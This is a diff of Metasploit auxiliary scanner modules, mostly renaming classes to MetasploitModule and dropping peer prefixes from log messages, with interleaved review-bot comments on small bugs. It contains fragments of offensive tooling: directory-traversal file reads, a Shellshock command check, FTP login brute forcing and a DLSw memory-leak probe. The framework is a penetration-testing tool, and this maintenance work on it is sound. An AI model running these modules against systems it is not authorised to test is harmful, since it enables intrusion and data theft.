diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index 2641054b1f..38e1786a8a 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb index d8f2d437cb..2bbea57cc3 100644 --- a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb +++ b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb @@ -8,7 +8,7 @@ require 'rex/proto/dcerpc' require 'rex/proto/dcerpc/wdscp' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb index 12c88f72f6..b47d050977 100644 --- a/modules/auxiliary/scanner/dect/call_scanner.rb +++ b/modules/auxiliary/scanner/dect/call_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb index cd1bf10cc4..532833e54d 100644 --- a/modules/auxiliary/scanner/dect/station_scanner.rb +++ b/modules/auxiliary/scanner/dect/station_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 50df7747c8..1f981c1dce 100644 
--- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/discovery/empty_udp.rb b/modules/auxiliary/scanner/discovery/empty_udp.rb index d64ec3ebd8..378d9e69f7 100644 --- a/modules/auxiliary/scanner/discovery/empty_udp.rb +++ b/modules/auxiliary/scanner/discovery/empty_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index 4795a21ae8..52d730b0c1 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index c60d28db3a..48fadda6c6 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ipv6 include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 08e6967dfe..2d6f9f71d1 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb 
+++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary the host portion of the IPv6 address. Use NDP host solicitation to determine if the IP address is valid' }, - 'Author' => 'wuntee', + 'Author' => ['wuntee', 'd0lph1n98'], 'License' => MSF_LICENSE, 'References' => [ @@ -33,20 +33,22 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('TIMEOUT_NEIGHBOR', [true, "Time (seconds) to listen for a solicitation response.", 1]) ], self.class) - register_advanced_options( - [ - OptString.new('PREFIX', [true, "Prefix that each host should get an IPv6 address from", - "2001:1234:DEAD:BEEF::"] - ) - ], self.class) - deregister_options('SNAPLEN', 'FILTER', 'RHOST', 'PCAPFILE') end + def generate_prefix() + max = 16 ** 4 + prefix = "2001:" + (0..2).each do + prefix << "%x:" % Random.rand(0..max) + end + return prefix << ':' + end + def listen_for_neighbor_solicitation(opts = {}) hosts = [] timeout = opts['TIMEOUT'] || datastore['TIMEOUT'] - prefix = opts['PREFIX'] || datastore['PREFIX'] + prefix = @prefix max_epoch = ::Time.now.to_i + timeout autoconf_prefix = IPAddr.new(prefix).to_string().slice(0..19) @@ -94,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary smac = @smac shost = opts['SHOST'] || datastore['SHOST'] || ipv6_link_address lifetime = opts['LIFETIME'] || datastore['TIMEOUT'] - prefix = opts['PREFIX'] || datastore['PREFIX'] + prefix = @prefix plen = 64 dmac = "33:33:00:00:00:01" @@ -141,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary checksum = 0 hop_limit = 0 flags = 0x08 - lifetime = 1800 + lifetime = 0 reachable = 0 retrans = 0 [type, code, checksum, hop_limit, flags, 
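Review bot: `Random.rand(0..max)` in the new `generate_prefix` (hunk `@@ -33,20 +33,22`) uses an inclusive range with `max = 16 ** 4`, so it can return 65536. That value formats as the five-digit group `10000`, and the later `IPAddr.new(prefix)` will then reject the address. An exclusive range keeps every group within 16 bits: `prefix << "%x:" % Random.rand(0...max)`. The hunk also removes the `PREFIX` option and the `opts['PREFIX']` override without explanation, so `generate_prefix` deserves a comment such as `# Builds a random 2001:xxxx:xxxx:xxxx:: prefix for this run; replaces the former PREFIX option`.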
@@ -152,6 +154,7 @@ class Metasploit3 < Msf::Auxiliary # Start capture open_pcap({'FILTER' => "icmp6"}) + @prefix = generate_prefix() @netifaces = true if not netifaces_implemented? print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available") diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index 152f3c7374..95363cd2b8 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index e8222d1e05..df8b24781e 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index 405e6e1851..9490798336 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report 
@@ -51,14 +51,14 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(_ip) - print_status("#{peer}: Checking for DLSw information disclosure (CVE-2014-7992)") + print_status("Checking for DLSw information disclosure (CVE-2014-7992)") response = get_response if response.blank? - vprint_status("#{peer}: no response") + vprint_status("No response") Exploit::CheckCode::Safe elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48" - vprint_good("#{peer}: Detected DLSw protocol") + vprint_good("Detected DLSw protocol") report_service( host: rhost, port: rport, @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary # TODO: check that response has something that truly indicates it is vulnerable # and not simply that it responded unless response[18..72].scan(/\x00/).length == 54 - print_good("#{peer}: vulnerable to DLSw information disclosure; leaked #{response.length} bytes") + print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes") report_vuln( host: rhost, port: rport, @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary Exploit::CheckCode::Vulnerable end else - vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data") + vprint_status("#{response.size}-byte response didn't contain any leaked data") Exploit::CheckCode::Safe end end @@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary 'DLSw_leaked_data', 'DLSw packet memory leak' ) - print_status("#{peer}: DLSw leaked data stored in #{path}") + print_status("DLSw leaked data stored in #{path}") end end diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb index 4b448dca11..a914489225 100644 --- a/modules/auxiliary/scanner/dns/dns_amp.rb +++ b/modules/auxiliary/scanner/dns/dns_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture 
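Review bot: In the `@@ -68,7 +68,7` hunk, `response[18..72].scan(/\x00/)` has no length check, so a reply that passes the two-byte signature test but is shorter than 18 bytes makes the slice `nil` and raises `NoMethodError` instead of returning a check code. The slice also covers 55 bytes while the count is compared with 54, so an all-zero region would still be reported as vulnerable; this looks like an off-by-one, but the intended packet layout is not visible here. A guard such as `return Exploit::CheckCode::Safe if response.length < 73` before the comparison would keep short replies out of `report_vuln`, and the bounds should be confirmed. `check_host` continues outside this hunk.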
diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb index 1dca83d949..50b9b0af01 100644 --- a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -32,14 +32,14 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Querying indices...") + vprint_status("Querying indices...") begin res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable - vprint_error("#{peer} - Unable to establish connection") + vprint_error("Unable to establish connection") return end @@ -47,11 +47,11 @@ class Metasploit3 < Msf::Auxiliary begin json_body = JSON.parse(res.body) rescue JSON::ParserError - vprint_error("#{peer} - Unable to parse JSON") + vprint_error("Unable to parse JSON") return end else - vprint_error("#{peer} - Timeout or unexpected response...") + vprint_error("Timeout or unexpected response...") return end @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary end if indices.length > 0 - print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}") + print_good("ElasticSearch Indices found: #{indices.join(", ")}") end end diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 98234fe2f9..89645436c3 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner 
diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 57e3e108e0..4570b9ab79 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index e95315b367..66f081533c 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index 8af1e9cf16..faeed16eb4 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb index 4970ab3c62..33b9c7c7a2 100644 --- a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 676ea23753..2ee8ac7b82 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb 
+++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/ftp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index e922b36249..60cb5e1ec6 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb index deceef291b..29163236d5 100644 --- a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb index bcdb39565b..6743f9008f 100644 --- a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index c29b0bb930..fd22f8a66b 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 56008ba45a..bded8208c7 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb index 6f80a86707..1a83f8a512 100644 --- a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 and res.body =~ /Error report/ - vprint_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + vprint_error("Cannot obtain '#{fname}', here are some possible reasons:") vprint_error("\t1. File does not exist.") vprint_error("\t2. The server does not have any patches deployed.") vprint_error("\t3. Your 'DEPTH' option isn't deep enough.") 
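Review bot: In the `@@ -61,7 +61,7` hunk of a10networks_ax_directory_traversal.rb, the context line `peer = "#{ip}:#{rport}"` is left behind although this commit removes every visible interpolation of `peer` (here and in the `@@ -73,7` and `@@ -88,11` hunks). The local now appears to be dead, and it still shadows the `peer` helper that other modules in this commit rely on. Unless the part of `run_host` outside these hunks uses it, the assignment can be deleted.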
@@ -88,11 +88,11 @@ class Metasploit3 < Msf::Auxiliary fname ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") elsif res and res.code == 404 and res.body.to_s =~ /The requested URL.*was not found/ - vprint_error("#{peer} - File not found. Check FILE.") + vprint_error("File not found. Check FILE.") else - vprint_error("#{peer} - Fail to obtain file for some unknown reason") + vprint_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb index bb63c2a7d3..af7ce9b7a4 100644 --- a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb +++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index e801a16c18..0b4fd6e2ea 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb index ab1cdd947e..eb22d9335e 100644 --- a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb +++ b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb index b5d88ff665..4bb3bece15 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb index fff6aa5d95..a5b43f7e2c 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index 6c0b87c217..6324d1152b 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -93,7 +93,7 @@ class Metasploit4 < Msf::Auxiliary res = req(datastore['CMD'], datastore['CVE']) if res && res.body =~ /#{marker}(.+)#{marker}/m - print_good("#{peer} - #{$1}") + print_good("#{$1}") report_vuln( :host => ip, :port => rport, 
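Review bot: In the `@@ -93,7 +93,7` hunk of apache_mod_cgi_bash_env.rb, the rewritten line `print_good("#{$1}")` wraps a single value in an interpolation that no longer does anything now that the `peer` prefix is gone. Passing the capture directly is clearer and avoids the Perl-style global: `print_good(Regexp.last_match(1))`. The capture is text taken from the remote response body and goes to the console as is; whether `print_good` filters control characters cannot be seen from this hunk.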
diff --git a/modules/auxiliary/scanner/http/apache_userdir_enum.rb b/modules/auxiliary/scanner/http/apache_userdir_enum.rb index 483f7acb5d..2b4711af17 100644 --- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb +++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/appletv_login.rb b/modules/auxiliary/scanner/http/appletv_login.rb index d2c30f1bf1..16265f428e 100644 --- a/modules/auxiliary/scanner/http/appletv_login.rb +++ b/modules/auxiliary/scanner/http/appletv_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index 78ee78a383..00f2f307f0 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index c4c029987c..a788774b35 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/scanner/http/axis_login.rb b/modules/auxiliary/scanner/http/axis_login.rb index c806a5df43..cd70c330f3 100644 --- a/modules/auxiliary/scanner/http/axis_login.rb +++ b/modules/auxiliary/scanner/http/axis_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/axis2' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index 3ac0d740bb..226d7f4f90 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index af42fa9fa9..15bee576e6 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index 21e93ce9b1..baa635fe7e 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary fname = datastore['FILE'] fname = fname[1, fname.length] if fname =~ /^\// - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /failed to open stream\: No such file/ - print_error("#{peer} - Cannot read '#{fname}'. File does not exist.") + print_error("Cannot read '#{fname}'. File does not exist.") elsif res and res.code == 200 and res.body =~ /failed to open stream\: Permission denied/ - print_error("#{peer} - Cannot read '#{fname}'. Permission denied.") + print_error("Cannot read '#{fname}'. Permission denied.") elsif res and res.code == 200 and res.body =~ /Failed opening required/ - print_error("#{peer} - Cannot read '#{fname}'. Possibly not vulnerable.") + print_error("Cannot read '#{fname}'. Possibly not vulnerable.") elsif res and res.code == 200 data = res.body @@ -86,10 +86,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{datastore['FILE']} stored as '#{p}'") + print_good("#{datastore['FILE']} stored as '#{p}'") else - print_error("#{peer} - Request failed due to some unknown reason") + print_error("Request failed due to some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index 4903073c2a..8ef7274949 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery 
